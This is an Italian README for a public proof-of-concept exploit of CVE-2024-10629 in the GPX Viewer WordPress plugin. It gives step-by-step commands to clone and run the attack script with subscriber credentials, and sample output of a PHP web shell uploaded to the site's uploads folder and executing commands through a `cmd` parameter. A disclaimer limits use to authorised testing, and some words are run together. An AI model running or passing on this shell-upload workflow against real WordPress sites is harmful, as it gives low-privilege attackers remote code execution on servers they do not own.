
GPX Viewer <= 2.2.8 - Creazione Arbitraria di File Autenticata (Abbonato+)
Questo repository contiene un proof-of-concept exploit per il plugin GPX Viewer per WordPress, che è vulnerabile alla creazione arbitraria di file (CVE-2024-10629). La vulnerabilità consente ad attaccanti autenticati con accesso a livello di abbonato o superiore di creare file arbitrari sul server del sito interessato, portando potenzialmente all'esecuzione remota di codice.
Il plugin GPX Viewer per WordPress è vulnerabile alla creazione arbitraria di file a causa della mancanza di un controllo delle capacità e della validazione del tipo di file nella funzione gpxv_file_upload() in tutte le versioni fino alla 2.2.8 inclusa. Ciò consente ad attaccanti autenticati, con accesso a livello di abbonato o superiore, di creare file arbitrari sul server del sito interessato, rendendo possibile l'esecuzione remota di codice.
requestsClona il repository:
git clone https://github.com/Nxploited/CVE-2024-10629/
cd CVE-2024-10629
Installa la libreria richiesta:
pip install requests
Esegui l'exploit:
python exploit.py -u <target_url> -un <username> -p <password>
Sostituisci <target_url>, <username> e <password> con i valori appropriati.
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password
Lo script mostrerà la versione del plugin e verificherà se è vulnerabile. Effettuerà quindi l'accesso utilizzando le credenziali fornite e tenterà di caricare la shell. In caso di successo, verificherà il caricamento della shell ed eseguirà un comando di esempio (ls).
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...
ls = Mostra i fileuname -a = Mostra le informazioni di sistemaQuesto exploit è destinato esclusivamente a scopi educativi e test autorizzati. L'uso non autorizzato di questo exploit contro sistemi di cui non si possiede o non si ha esplicito permesso di testare è illegale e non etico. Gli autori e i contributori di questo repository non sono responsabili per qualsiasi uso improprio o danno causato da questo exploit.
Di: Khaled Alenazi (Nxploit)